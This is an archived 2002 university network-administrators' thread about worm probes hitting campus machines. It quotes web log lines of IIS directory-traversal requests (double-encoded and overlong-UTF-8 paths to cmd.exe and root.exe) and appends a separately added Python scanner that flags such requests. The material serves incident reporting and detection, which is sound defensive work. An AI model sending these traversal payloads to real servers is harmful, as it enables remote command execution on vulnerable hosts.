MSUNAG Archives

Subject: Re: MS Virus or Worm activity
From: Paul Donahue <[log in to unmask]>
Reply-To: MSU Network Administrators Group <[log in to unmask]>
Date: Mon, 21 Jan 2002 09:26:54 -0500
Content-Type: text/plain

Not to be a "me-too"er but I have noticed the same from the same IP
addresses on one of our Windows boxes. ZoneAlarm showed approximately
400 alerts since 6pm Friday until 8am this morning.




Paul Donahue
Lead Computer/Network Technician
CVM Information Technology Center
A227 VMC, Michigan State University
Phone:  353-5551   Fax:  432-2937

>>> [log in to unmask] 01/21/02 08:51AM >>>
Probes from these hosts started coming in just before 11:00pm Saturday
night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS. Domain: llc,
  Language Learning Center in Old Hort


Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691
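
One way to pick the request patterns quoted above out of a Common Log Format access log, as an added example that is not part of either message. The function names and reason labels are this example's own; the four 35.8.33.189 lines are taken from the log excerpt above (re-joined), and the 192.0.2.10 line is constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Common Log Format fields used here: client, request URL, status.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
TARGET = re.compile(rb'/(cmd|root)\.exe$', re.I)

def classify(url):
    """Return the reasons a request URL resembles the quoted probes."""
    once = unquote_to_bytes(url.split('?', 1)[0])  # path after one decode
    twice = unquote_to_bytes(once)  # a second decode exposes %255c, %%35c
    reasons = set()
    if twice != once:
        reasons.add('double-encoded')
    if b'\xc0' in once or b'\xc1' in once:
        reasons.add('overlong-utf8')  # 0xC0/0xC1 never start valid UTF-8
    if b'../' in twice or b'..\\' in twice:
        reasons.add('traversal')
    if TARGET.search(twice):
        reasons.add('shell-target')
    return reasons

def scan(lines):
    """Map client IP -> Counter of reasons; unparsable lines are skipped."""
    hits = defaultdict(Counter)
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue
        ip, url, status = m.groups()
        reasons = classify(url)
        if reasons:
            if status.startswith('2'):
                reasons.add('answered-2xx')  # probe was served: check host
            hits[ip].update(reasons)
    return dict(hits)

PREFIX = '35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET '
SAMPLE = [
    PREFIX + '/MSADC/root.exe?/c+dir HTTP/1.0" 404 286',
    PREFIX + '/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    PREFIX + '/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309',
    PREFIX + '/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293',
    # Constructed benign request from a documentation address.
    '192.0.2.10 - - [21/Jan/2002:08:40:00 -0500] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == '__main__':
    for ip, counts in scan(SAMPLE).items():
        print(ip, dict(counts))
```

The double-encoding check is a heuristic and will also flag a legitimate path that contains an encoded percent sign, so treat it as a triage signal alongside the other reasons.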
